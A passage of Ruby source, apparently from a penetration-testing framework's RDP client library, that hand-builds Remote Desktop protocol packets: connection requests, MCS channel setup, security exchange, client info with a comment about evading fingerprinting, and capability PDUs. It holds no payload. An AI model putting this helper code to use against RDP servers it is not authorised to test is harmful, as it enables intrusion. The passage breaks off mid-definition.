 666 |       bits_needed = Math.log(int_val) / Math.log(2)
 667 |       num_chars = ( bits_needed / 8.0 ).ceil
 668 |     end
 669 |     if pack_code = { 1 => 'C', 2 => 'S', 4 => 'L' }[num_chars]
 670 |       [int_val].pack(pack_code)
 671 |     else
 672 |       a = (0..(num_chars)).map{ |i|
 673 |         (( int_val >> i*8 ) & 0xFF ).chr
 674 |       }.join
 675 |       a[0..-2] # seems legit lol
 676 |     end
 677 |   end
 678 | 
 679 |   def bin_to_hex(str_val)
 680 |     str_val.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
 681 |   end
 682 | 
 683 | 
 684 |   #
 685 |   # Protocol Data Unit definitions and helpers
 686 |   #
 687 | 
 688 |   # Build the X.224 packet, encrypt with Standard RDP Security as needed
 689 |   # default channel_id = 0x03eb = 1003
 690 |   def rdp_build_pkt(data, channel_id = "\x03\xeb", client_info: false, license_info: false)
 691 |     flags = 0
 692 |     flags |= 0x08 if @rdp_sec     # Set SEC_ENCRYPT
 693 |     flags |= 0x40 if client_info  # Set SEC_INFO_PKT
 694 |     flags |= 0x80 if license_info # Set SEC_LICENSE_PKT
 695 | 
 696 |     pdu = ""
 697 | 
 698 |     # TS_SECURITY_HEADER - 2.2.8.1.1.2.1
 699 |     # Send when the packet is encrypted w/ Standard RDP Security and in all Client Info PDUs
 700 |     if client_info || @rdp_sec
 701 |       pdu << [flags].pack("S<")  # flags  "\x48\x00" = SEC_INFO_PKT | SEC_ENCRYPT
 702 |       pdu << "\x00\x00"          # flagsHi
 703 |     end
 704 | 
 705 |     if @rdp_sec
 706 |       # Encrypt the payload with RDP Standard Encryption
 707 |       pdu << rdp_hmac(@hmackey, data)[0..7]
 708 |       pdu << rdp_rc4_crypt(@rc4enckey, data)
 709 |     else
 710 |       pdu << data
 711 |     end
 712 | 
 713 |     user_data_len = pdu.length
 714 |     udl_with_flag = 0x8000 | user_data_len
 715 | 
 716 |     pkt =  "\x64"      # sendDataRequest
 717 |     pkt << "\x00\x08"  # intiator userId .. TODO: for a functional client this isn't static
 718 |     pkt << channel_id  # channelId
 719 |     pkt << "\x70"      # dataPriority
 720 |     pkt << [udl_with_flag].pack("S>")
 721 |     pkt << pdu
 722 | 
 723 |     build_data_tpdu(pkt)
 724 |   end
 725 | 
 726 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/6c074267-1b32-4ceb-9496-2eb941a23e6b
 727 |   # Virtual Channel PDU 2.2.6.1
 728 |   def build_virtual_channel_pdu(flags, data)
 729 |     data_len = data.length
 730 | 
 731 |     [data_len].pack("L<") + # length
 732 |       [flags].pack("L<") +  # flags
 733 |       data
 734 |   end
 735 | 
 736 |   # Builds x.224 Data (DT) TPDU - Section 13.7
 737 |   def build_data_tpdu(data)
 738 |     tpkt_length = data.length + 7
 739 | 
 740 |     "\x03\x00" +                 # TPKT Header version 03, reserved 0
 741 |       [tpkt_length].pack("S>") + # TPKT length
 742 |       "\x02\xf0\x80" +           # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission)
 743 |       data
 744 |   end
 745 | 
 746 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpele/c57e4890-9049-421e-9fe8-9a6f9519675a
 747 |   # Client New License Request PDU - 2.2.2.2
 748 |   def pdu_new_license_request(client_random, user, host)
 749 |     length = 24 + client_random.length + 64 + user.length + 1 + host.length + 1
 750 | 
 751 |     [RDPConstants::LICENSE_NEW_LICENSE_REQ].pack("C") +
 752 |     "\x03" +                         # Version
 753 |     [length].pack("S<") +            # Length
 754 |     "\x01\x01\x00\x00\x00\x01\xff" + # KEY_EXCHANGE_ALG_RSA
 755 |     client_random[0..31] +
 756 |     "\x02\x00" +                     # Encrypted Premaster Secret RANDOM_BLOB
 757 |     [64].pack("S<") +
 758 |     "\x00" * 64 +                    # The client license premaster secret, we don't care about the license contents
 759 |     "\x0f\x00" +                     # USER_NAME_BLOB
 760 |     [user.length + 1].pack("S<") +
 761 |     user + "\x00" +
 762 |     "\x10\x00" +                     # CLIENT_MACHINE_NAME_BLOB
 763 |     [host.length + 1].pack("S<") +
 764 |     host + "\x00"
 765 | 
 766 |   end
 767 | 
 768 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/18a27ef9-6f9a-4501-b000-94b1fe3c2c10
 769 |   # Client X.224 Connect Request PDU - 2.2.1.1
 770 |   def pdu_negotiation_request(user_name = "", requested_protocols = 0)
 771 |     # Blank username is ok, nil = random
 772 |     user_name = Rex::Text.rand_text_alpha(12) if user_name.nil?
 773 |     tpkt_len = user_name.length + 38
 774 |     x224_len = user_name.length + 33
 775 | 
 776 |     "\x03\x00" +              # TPKT Header version 03, reserved 0
 777 |       [tpkt_len].pack("S>") + # TPKT length: 43
 778 |       [x224_len].pack("C") +  # X.224 LengthIndicator
 779 |       "\xe0" +        # X.224 Type: Connect Request
 780 |       "\x00\x00" +    # dst reference
 781 |       "\x00\x00" +    # src reference
 782 |       "\x00" +        # class and options
 783 |       # cookie - literal 'Cookie: mstshash='
 784 |       "\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x6d\x73\x74\x73\x68\x61\x73\x68\x3d" +
 785 |       user_name +     # Identifier "username"
 786 |       "\x0d\x0a" +    # cookie terminator
 787 |       "\x01\x00" +    # Type: RDP Negotiation Request ( 0x01 )
 788 |       "\x08\x00" +    # Length
 789 |       [requested_protocols].pack('L<') # requestedProtocols
 790 |   end
 791 | 
 792 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
 793 |   def pdu_connect_initial(channels, selected_proto = 0, host_name = "rdesktop")
 794 |     # After negotiating TLS or NLA the connectInitial packet needs to include the
 795 |     # protocol selection that the server indicated in its Negotiation Response
 796 | 
 797 |     pdu = [
 798 |       "\x7f\x65",        # T.125 Connect-Initial (BER: Application 101)
 799 |       ber_data(
 800 |         "\x04\x01\x01",    # CallingDomainSelector: 1 (BER: OctetString)
 801 |         "\x04\x01\x01",    # CalledDomainSelector: 1 (BER: OctetString)
 802 |         "\x01\x01\xff",    # UpwaredFlag: True (BER: boolean)
 803 | 
 804 |         # TargetParamenters
 805 |         encode_domain_selector(
 806 |           max_chan_ids: 0x22,
 807 |           max_user_ids: 0x2
 808 |         ),
 809 |         # MinimumParameters
 810 |         encode_domain_selector(
 811 |           max_chan_ids: 0x1,
 812 |           max_user_ids: 0x1,
 813 |           max_token_ids: 0x1,
 814 |           max_mcspdu_size: 0x0420
 815 |         ),
 816 |         # MaximumParameters
 817 |         encode_domain_selector(
 818 |           max_chan_ids: 0xffff,
 819 |           max_user_ids: 0xfc17,
 820 |           max_token_ids: 0xffff
 821 |         ),
 822 |         # UserData
 823 |         ber_octet_string(
 824 |           # T.124 GCC Connection Data (ConnectData)- PER Encoding used
 825 |           per_object(oid(0, 0, 20, 124, 0, 1)),
 826 |           per_data(
 827 |             conf_create_req(),
 828 |             per_data(
 829 |               cs_core_data(client_name: host_name, selected_proto: selected_proto),
 830 |               cs_cluster_data(),
 831 |               cs_security_data(),
 832 |               cs_network_data(channels)
 833 |             )
 834 |           )
 835 |         )
 836 |       )
 837 |     ].join('')
 838 | 
 839 |     build_data_tpdu(pdu)
 840 |   end
 841 | 
 842 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c
 843 |   # Client MCS Erect Domain Request PDU - 2.2.1.5
 844 |   def pdu_erect_domain_request
 845 |     pdu =
 846 |       "\x04" +       # T.125 ErectDomainRequest
 847 |       "\x01\x00" +   # subHeight - length 1, value 0
 848 |       "\x01\x00"     # subInterval - length 1, value 0
 849 | 
 850 |     build_data_tpdu(pdu)
 851 |   end
 852 | 
 853 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247\
 854 |   # Client MCS Attach User Request PDU - 2.2.1.6
 855 |   def pdu_attach_user_request
 856 |     pdu = "\x28"  # T.125 AttachUserRequest
 857 | 
 858 |     build_data_tpdu(pdu)
 859 |   end
 860 | 
 861 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/64564639-3b2d-4d2c-ae77-1105b4cc011b
 862 |   # Client MCS Channel Join Request PDU -2.2.1.8
 863 |   def pdu_channel_join_request(user1, channel_id)
 864 |     pdu =
 865 |       "\x38" + # T.125 ChannelJoinRequest
 866 |       [user1, channel_id].pack("nn")
 867 | 
 868 |     build_data_tpdu(pdu)
 869 |   end
 870 | 
 871 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f
 872 |   # Client Security Exchange PDU - 2.2.1.10
 873 |   def pdu_security_exchange(rcran, rsexp, rsmod, bitlen)
 874 |     encrypted_rcran_bignum = rsa_encrypt(rcran, rsexp, rsmod)
 875 |     encrypted_rcran = int_to_bytestring(encrypted_rcran_bignum)
 876 | 
 877 |     bitlen += 8 # Pad with size of TS_SECURITY_PACKET header
 878 | 
 879 |     userdata_length = 8 + bitlen
 880 |     userdata_length_low = userdata_length & 0xFF
 881 |     userdata_length_high = userdata_length / 256
 882 |     flags = 0x80 | userdata_length_high
 883 | 
 884 |     pdu =
 885 |       "\x64" +            # T.125 sendDataRequest
 886 |       "\x00\x08" +        # intiator userId
 887 |       "\x03\xeb" +        # channelId = 1003
 888 |       "\x70" +            # dataPriority = high, segmentation = begin | end
 889 |       [flags].pack("C") +
 890 |       [userdata_length_low].pack("C") + # UserData length
 891 |       # TS_SECURITY_PACKET - 2.2.1.10.1
 892 |       "\x01\x00" +           # securityHeader flags
 893 |       "\x00\x00" +           # securityHeader flagsHi
 894 |       [bitlen].pack("L<") +  # TS_ length
 895 |       encrypted_rcran +      # encryptedClientRandom - 64 bytes
 896 |       "\x00\x00\x00\x00\x00\x00\x00\x00" # 8 bytes rear padding (always present)
 897 | 
 898 |     build_data_tpdu(pdu)
 899 |   end
 900 | 
 901 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d
 902 |   # TS_INFO_PACKET - 2.2.1.11.1.1
 903 |   def pdu_client_info(user_name, domain_name = "", ip_address = "")
 904 |     # Max len for 4.0/6.0 servers is 44 bytes including terminator
 905 |     # Max len for all other versions is 512 including terminator
 906 |     # We're going to limit to 44 (21 chars + null -> unicode) here.
 907 |     # Blank username is ok, nil = random
 908 |     user_name = Rex::Text.rand_text_alpha(10) if user_name.nil?
 909 |     user_unicode = Rex::Text.to_unicode(user_name[0..20], 'utf-16le')
 910 |     uname_len = user_unicode.length
 911 | 
 912 |     # Domain can can be, and for rdesktop typically is, empty.
 913 |     # Max len for 4.0/5.0 servers is 52 including terminator
 914 |     # Max len for all other versions is 512 including terminator
 915 |     # We're going to limit to 52 (25 chars + null -> unicode) here.
 916 |     domain_unicode = Rex::Text.to_unicode(domain_name[0..24], 'utf-16le')
 917 |     domain_len = domain_unicode.length
 918 | 
 919 |     # This address value is primarily used to reduce the fields by which this
 920 |     # module can be fingerprinted. It doesn't show up in Windows logs.
 921 |     # clientAddress + null terminator
 922 |     ip_unicode = Rex::Text.to_unicode(ip_address, 'utf-16le') + "\x00\x00"
 923 |     ip_len = ip_unicode.length
 924 | 
 925 |     "\x00\x00\x00\x00" +    # CodePage
 926 |       "\x33\x01\x00\x00" +  # flags - INFO_MOUSE, INFO_DISABLECTRLALTDEL, INFO_UNICODE, INFO_MAXIMIZESHELL, INFO_ENABLEWINDOWSKEY
 927 |       [domain_len].pack("S<") + # cbDomain (length value) - EXCLUDES null terminator
 928 |       [uname_len].pack("S<") +  # cbUserName (length value) - EXCLUDES null terminator
 929 |       "\x00\x00" +  # cbPassword (length value)
 930 |       "\x00\x00" +  # cbAlternateShell (length value)
 931 |       "\x00\x00" +  # cbWorkingDir (length value)
 932 |       [domain_unicode].pack("a*") + # Domain
 933 |       "\x00\x00" +                  # Domain null terminator, EXCLUDED from value of cbDomain
 934 |       [user_unicode].pack("a*") +   # UserName
 935 |       "\x00\x00" +  # UserName null terminator, EXCLUDED FROM value of cbUserName
 936 |       "\x00\x00" +  # Password - empty
 937 |       "\x00\x00" +  # AlternateShell - empty
 938 |       "\x00\x00" +  # WorkingDir - empty
 939 |       # TS_EXTENDED_INFO_PACKET - 2.2.1.11.1.1.1
 940 |       "\x02\x00" +              # clientAddressFamily - AF_INET - FIXFIX - detect and set dynamically
 941 |       [ip_len].pack("S<") +     # cbClientAddress (length value) - INCLUDES terminator ... for reasons.
 942 |       [ip_unicode].pack("a*") + # clientAddress (unicode + null terminator (unicode)
 943 |       "\x3c\x00" +              # cbClientDir (length value): 60
 944 |       # clientDir - 'C:\WINNT\System32\mstscax.dll' + null terminator
 945 |       "\x3c\x00\x43\x00\x3a\x00\x5c\x00\x57\x00\x49\x00\x4e\x00\x4e\x00" + #
 946 |       "\x54\x00\x5c\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6d\x00" + #
 947 |       "\x33\x00\x32\x00\x5c\x00\x6d\x00\x73\x00\x74\x00\x73\x00\x63\x00" + #
 948 |       "\x61\x00\x78\x00\x2e\x00\x64\x00\x6c\x00\x6c\x00\x00\x00" + #
 949 |       # clientTimeZone - TS_TIME_ZONE struct - 172 bytes
 950 |       # These are the default values for rdesktop
 951 |       "\xa4\x01\x00\x00" + # Bias
 952 |       # StandardName - 'GTB,normaltid'
 953 |       "\x47\x00\x54\x00\x42\x00\x2c\x00\x20\x00\x6e\x00\x6f\x00\x72\x00" + #
 954 |       "\x6d\x00\x61\x00\x6c\x00\x74\x00\x69\x00\x64\x00\x00\x00\x00\x00" + #
 955 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 956 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 957 |       "\x00\x00\x0a\x00\x00\x00\x05\x00\x03\x00\x00\x00\x00\x00\x00\x00" + # StandardDate - Oct 5
 958 |       "\x00\x00\x00\x00" + # StandardBias
 959 |       # DaylightName - 'GTB,sommartid'
 960 |       "\x47\x00\x54\x00\x42\x00\x2c\x00\x20\x00\x73\x00\x6f\x00\x6d\x00" + #
 961 |       "\x6d\x00\x61\x00\x72\x00\x74\x00\x69\x00\x64\x00\x00\x00\x00\x00" + #
 962 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 963 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
 964 |       "\x00\x00\x03\x00\x00\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00\x00" + # DaylightDate - Mar 3
 965 |       "\xc4\xff\xff\xff" + # DaylightBias
 966 |       "\x00\x00\x00\x00" + # clientSessionId
 967 |       "\x27\x00\x00\x00" + # performanceFlags
 968 |       "\x00\x00"           # cbAutoReconnectCookie
 969 |   end
 970 | 
 971 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/73d01865-2eae-407f-9b2c-87e31daac471
 972 |   # Share Control Header - TS_SHARECONTROLHEADER - 2.2.8.1.1.1.1
 973 |   def build_share_control_header(type, data)
 974 |     total_len = data.length + 6
 975 | 
 976 |     [total_len].pack("S<") + # totalLength - includes all headers
 977 |       [type].pack("S<") +    # pduType - flags 16 bit, unsigned
 978 |       "\xf1\x03" +           # PDUSource: 0x03f1 = 1009
 979 |       data
 980 |   end
 981 | 
 982 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4b5d4c0d-a657-41e9-9c69-d58632f46d31
 983 |   # Share Data Header - TS_SHAREDATAHEADER - 2.2.8.1.1.1.2
 984 |   def build_share_data_header(type, data)
 985 |     uncompressed_len = data.length + 4
 986 | 
 987 |     "\xea\x03\x01\x00" + # shareId: 66538
 988 |       "\x00" +     # pad1
 989 |       "\x01" +     # streamID: 1
 990 |       [uncompressed_len].pack("S<") + # uncompressedLength - 16 bit, unsigned int
 991 |       [type].pack("C") + # pduType2 - 8 bit, unsigned int - 2.2.8.1.1.2
 992 |       "\x00" +     # compressedType: 0
 993 |       "\x00\x00" + # compressedLength: 0
 994 |       data
 995 |   end
 996 | 
 997 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9d1e1e21-d8b4-4bfd-9caf-4b72ee91a7135
 998 |   # Control Cooperate - TC_CONTROL_PDU 2.2.1.15
 999 |   def pdu_client_control_cooperate
1000 |     pdu =
1001 |       "\x04\x00" +       # action: 4 - CTRLACTION_COOPERATE
1002 |       "\x00\x00" +       # grantId: 0
1003 |       "\x00\x00\x00\x00" # controlId: 0
1004 | 
1005 |     # pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
1006 |     data_header = build_share_data_header(0x14, pdu)
1007 | 
1008 |     # type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
1009 |     build_share_control_header(0x17, data_header)
1010 |   end
1011 | 
1012 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4f94e123-970b-4242-8cf6-39820d8e3d35
1013 |   # Control Request - TC_CONTROL_PDU 2.2.1.16
1014 |   def pdu_client_control_request
1015 |     pdu =
1016 |       "\x01\x00" +       # action: 1 - CTRLACTION_REQUEST_CONTROL
1017 |       "\x00\x00" +       # grantId: 0
1018 |       "\x00\x00\x00\x00" # controlId: 0
1019 | 
1020 |     # pduType2 = 0x14 = 20 - PDUTYPE2_CONTROL
1021 |     data_header = build_share_data_header(0x14, pdu)
1022 | 
1023 |     # type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
1024 |     build_share_control_header(0x17, data_header)
1025 |   end
1026 | 
1027 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7067da0d-e318-4464-88e8-b11509cf0bd9
1028 |   # Client Font List - TS_FONT_LIST_PDU - 2.2.1.18
1029 |   def pdu_client_font_list
1030 |     pdu =
1031 |       "\x00\x00" + # numberFonts: 0
1032 |       "\x00\x00" + # totalNumberFonts: 0
1033 |       "\x03\x00" + # listFlags: 3 (FONTLIST_FIRST | FONTLIST_LAST)
1034 |       "\x32\x00"   # entrySize: 50
1035 | 
1036 |     # pduType2 = 0x27 = 29 -  PDUTYPE2_FONTLIST
1037 |     data_header = build_share_data_header(0x27, pdu)
1038 | 
1039 |     # type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
1040 |     build_share_control_header(0x17, data_header)
1041 |   end
1042 | 
1043 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5186005a-36f5-4f5d-8c06-968f28e2d992
1044 |   # Client Synchronize - TS_SYNCHRONIZE_PDU - 2.2.1.19 /  2.2.14.1
1045 |   def pdu_client_synchronize(target_user = 0)
1046 |     pdu =
1047 |       "\x01\x00" +              # messageType: 1 SYNCMSGTYPE_SYNC
1048 |       [target_user].pack("S<")  # targetUser, 16 bit, unsigned.
1049 | 
1050 |     # pduType2 = 0x1f = 31 - PDUTYPE2_SCYNCHRONIZE
1051 |     data_header = build_share_data_header(0x1f, pdu)
1052 | 
1053 |     # type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
1054 |     build_share_control_header(0x17, data_header)
1055 |   end
1056 | 
1057 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4e9722c3-ad83-43f5-af5a-529f73d88b48
1058 |   # Confirm Active PDU Data - TS_CONFIRM_ACTIVE_PDU - 2.2.1.13.2.1
1059 |   def pdu_client_confirm_active
1060 |     pdu =
1061 |       "\xea\x03\x01\x00" + # shareId: 66538
1062 |       "\xea\x03" + # originatorId
1063 |       "\x06\x00" + # lengthSourceDescriptor: 6
1064 |       "\x8e\x01" + # lengthCombinedCapabilities: 398
1065 |       "\x4d\x53\x54\x53\x43\x00" + # SourceDescriptor: 'MSTSC'
1066 |       "\x0e\x00" + # numberCapabilities: 14
1067 |       "\x00\x00" + # pad2Octets
1068 |       "\x01\x00" + # capabilitySetType: 1 - TS_GENERAL_CAPABILITYSET
1069 |       "\x18\x00" + # lengthCapability: 24
1070 |       "\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x0d\x04\x00\x00\x00\x00" + #
1071 |       "\x00\x00\x00\x00" + #
1072 |       "\x02\x00" + # capabilitySetType: 2 - TS_BITMAP_CAPABILITYSET
1073 |       "\x1c\x00" + # lengthCapability: 28
1074 |       "\x10\x00\x01\x00\x01\x00\x01\x00\x20\x03\x58\x02\x00\x00\x01\x00" + #
1075 |       "\x01\x00\x00\x00\x01\x00\x00\x00" + #
1076 |       "\x03\x00" + # capabilitySetType: 3 - TS_ORDER_CAPABILITYSET
1077 |       "\x58\x00" + # lengthCapability: 88
1078 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
1079 |       "\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x47\x01\x2a\x00" + #
1080 |       "\x01\x01\x01\x01\x00\x00\x00\x00\x01\x01\x01\x01\x00\x01\x01\x00" + #
1081 |       "\x00\x00\x00\x00\x01\x01\x01\x00\x00\x01\x01\x01\x00\x00\x00\x00" + #
1082 |       "\xa1\x06\x00\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00" + #
1083 |       "\xe4\x04\x00\x00\x13\x00\x28\x00\x00\x00\x00\x03\x78\x00\x00\x00" + #
1084 |       "\x78\x00\x00\x00\x50\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
1085 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
1086 |       "\x08\x00" + # capabilitySetType: 8 - TS_POINTER_CAPABILITYSET
1087 |       "\x0a\x00" + # lengthCapability: 10
1088 |       "\x01\x00\x14\x00\x14\x00" + #
1089 |       "\x0a\x00" + # capabilitySetType: 10 - TS_COLORTABLE_CAPABILITYSET
1090 |       "\x08\x00" + # lengthCapability: 8
1091 |       "\x06\x00\x00\x00" + #
1092 |       "\x07\x00" + # capabilitySetType: 7 - TSWINDOWACTIVATION_CAPABILITYSET
1093 |       "\x0c\x00" + # lengthCapability: 12
1094 |       "\x00\x00\x00\x00\x00\x00\x00\x00" + #
1095 |       "\x05\x00" + # capabilitySetType: 5 - TS_CONTROL_CAPABILITYSET
1096 |       "\x0c\x00" + # lengthCapability: 12
1097 |       "\x00\x00\x00\x00\x02\x00\x02\x00" + #
1098 |       "\x09\x00" + # capabilitySetType: 9 - TS_SHARE_CAPABILITYSET
1099 |       "\x08\x00" + # lengthCapability: 8
1100 |       "\x00\x00\x00\x00" + #
1101 |       "\x0f\x00" + # capabilitySetType: 15 - TS_BRUSH_CAPABILITYSET
1102 |       "\x08\x00" + # lengthCapability: 8
1103 |       "\x01\x00\x00\x00" + #
1104 |       "\x0d\x00" + # capabilitySetType: 13 - TS_INPUT_CAPABILITYSET
1105 |       "\x58\x00" + # lengthCapability: 88
1106 |       "\x01\x00\x00\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" + #
1107 |       "\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
1108 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
1109 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
1110 |       "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #
1111 |       "\x00\x00\x00\x00" + #
1112 |       "\x0c\x00" + # capabilitySetType: 12 - TS_SOUND_CAPABILITYSET
1113 |       "\x08\x00" + # lengthCapability: 8
1114 |       "\x01\x00\x00\x00" + #
1115 |       "\x0e\x00" + # capabilitySetType: 14 - TS_FONT_CAPABILITYSET
1116 |       "\x08\x00" + # lengthCapability: 8
1117 |       "\x01\x00\x00\x00" + #
1118 |       "\x10\x00" + # capabilitySetType: 16 - TS_GLYPHCAChE_CAPABILITYSET
1119 |       "\x34\x00" + # lengthCapability: 52
1120 |       "\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00" + #
1121 |       "\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00" + #
1122 |       "\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x02\x00\x00\x00"
1123 | 
1124 |     # type = 0x13 = TS_PROTOCOL_VERSION | PDUTYPE_CONFIRMACTIVEPDU
1125 |     build_share_control_header(0x13, pdu)
1126 |   end
1127 | 
1128 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/ff7f06f8-0dcf-4c8d-be1f-596ae60c4396
1129 |   # Client Input Event Data - TS_INPUT_PDU_DATA - 2.2.8.1.1.3.1
1130 |   def pdu_client_input_event_sychronize
1131 |     pdu =
1132 |       "\x01\x00" +         # numEvents: 1
1133 |       "\x00\x00" +         # pad2Octets
1134 |       "\x00\x00\x00\x00" + # eventTime
1135 |       "\x00\x00" +         # messageType: 0 - INPUT_EVENT_SYNC
1136 |       # TS_SYNC_EVENT 202.8.1.1.3.1.1.5
1137 |       "\x00\x00" +         # pad2Octets
1138 |       "\x00\x00\x00\x00"   # toggleFlags
1139 | 
1140 |     # pduType2 = 0x1c = 28 - PDUTYPE2_INPUT
1141 |     data_header = build_share_data_header(0x1c, pdu)
1142 | 
1143 |     # type = 0x17 = TS_PROTOCOL_VERSION | PDUTYPE_DATAPDU
1144 |     build_share_control_header(0x17, data_header)
1145 |   end
1146 | 
1147 |   #
1148 |   # Non-RDP protocol helper methods
1149 |   #
1150 | 
1151 |   # Create a new SSL session on the existing socket.
1152 |   # Stolen from exploit/smtp_deliver.rb
1153 |   def swap_sock_plain_to_ssl
1154 |     ctx = OpenSSL::SSL::SSLContext.new
1155 |     ctx.min_version = OpenSSL::SSL::TLS1_VERSION
1156 |     ctx.security_level = datastore['RDP_TLS_SECURITY_LEVEL']
1157 |     ssl = OpenSSL::SSL::SSLSocket.new(self.rdp_sock, ctx)
1158 | 
1159 |     begin
1160 |       ssl.connect
1161 |     rescue Errno::ECONNRESET
1162 |       vprint_error("Retry with advanced option RDP_TLS_SECURITY_LEVEL=0")
1163 |       raise
1164 |     end
1165 | 
1166 |     self.rdp_sock.extend(Rex::Socket::SslTcp)
1167 |     self.rdp_sock.sslsock = ssl
1168 |     self.rdp_sock.sslctx  = ctx
1169 |   end
1170 | 
1171 | protected
1172 | 
1173 |   def encode_domain_selector(
1174 |     max_chan_ids: 0,
1175 |     max_user_ids: 0,
1176 |     max_token_ids: 0,
1177 |     num_priorities: 1,
1178 |     min_throughput: 0,
1179 |     max_height: 1,
1180 |     max_mcspdu_size: 65535,
1181 |     protocol_ver: 2
1182 |   )
1183 | 
1184 |     body = [
1185 |       ber_int(max_chan_ids),
1186 |       ber_int(max_user_ids),
1187 |       ber_int(max_token_ids),
1188 |       ber_int(num_priorities),
1189 |       ber_int(min_throughput),
1190 |       ber_int(max_height),
1191 |       ber_int(max_mcspdu_size),
1192 |       ber_int(protocol_ver)
1193 |     ].join('')
1194 | 
1195 |     result = [
1196 |       "\x30",
1197 |       [body.length].pack('C'),
1198 |       body
1199 |     ].join('')
1200 | 
1201 |     result
1202 |   end
1203 | 
1204 |   def per_object(*ds)
1205 |     body = ds.join('')
1206 | 
1207 |     result = [
1208 |       "\x00",
1209 |       [body.length].pack('C'),
1210 |       body
1211 |     ].join('')
1212 | 
1213 |     result
1214 |   end
1215 | 
1216 |   def per_data(*ds)
1217 |     data = ds.join('')
1218 |     result = ''
1219 |     if data.length < 0x4000
1220 |       result = [data.length | 0x8000].pack('S>') + data
1221 |     else
1222 |       result = "\xA2" + [data.length].pack('S>') + data
1223 |     end
1224 | 
1225 |     result
1226 |   end
1227 | 
1228 |   def cs_cluster_data(
1229 |     flags: RDPConstants::REDIRECTION_SUPPORTED | RDPConstants::REDIRECTION_VERSION3,
1230 |     session_id: 0
1231 |   )
1232 |     body = [flags, session_id].pack('<L<L')
1233 | 
1234 |     result = [
1235 |       [0xc004, body.length + 4].pack('<S<S'),
1236 |       body
1237 |     ].join('')
1238 | 
1239 |     result
1240 |   end
1241 | 
1242 |   def cs_security_data(
1243 |     encryption_methods: RDPConstants::ENCRYPTION_40BIT | RDPConstants::ENCRYPTION_128BIT,
1244 |     ext_encryption_methods: 0
1245 |   )
1246 |     body = [encryption_methods, ext_encryption_methods].pack('<L<L')
1247 | 
1248 |     result = [
1249 |       [0xc002, body.length + 4].pack('<S<S'),
1250 |       body
1251 |     ].join('')
1252 | 
1253 |     result
1254 |   end
1255 | 
1256 |   def cs_network_data(channels)
1257 |     chan_data = channels.map{ |c|
1258 |       [c[0].encode('ASCII')].pack('a8*') + [c[1]].pack('L')
1259 |     }.join('')
1260 | 
1261 |     body = [
1262 |       [channels.length].pack('L'),
1263 |       chan_data
1264 |     ].join('')
1265 | 
1266 |     result = [
1267 |       [0xc003, body.length + 4].pack('<S<S'),
1268 |       body
1269 |     ].join('')
1270 | 
1271 |     result
1272 |   end
1273 | 
1274 | 
1275 |   def cs_core_data(
1276 |     version: 0x80004,
1277 |     width: 800,
1278 |     height: 600,
1279 |     keyboard: 1033, # English
1280 |     client_build: 2600,
1281 |     client_name: "rdesktop",
1282 |     keyboard_type: 4, # IBMEhanced 101/102
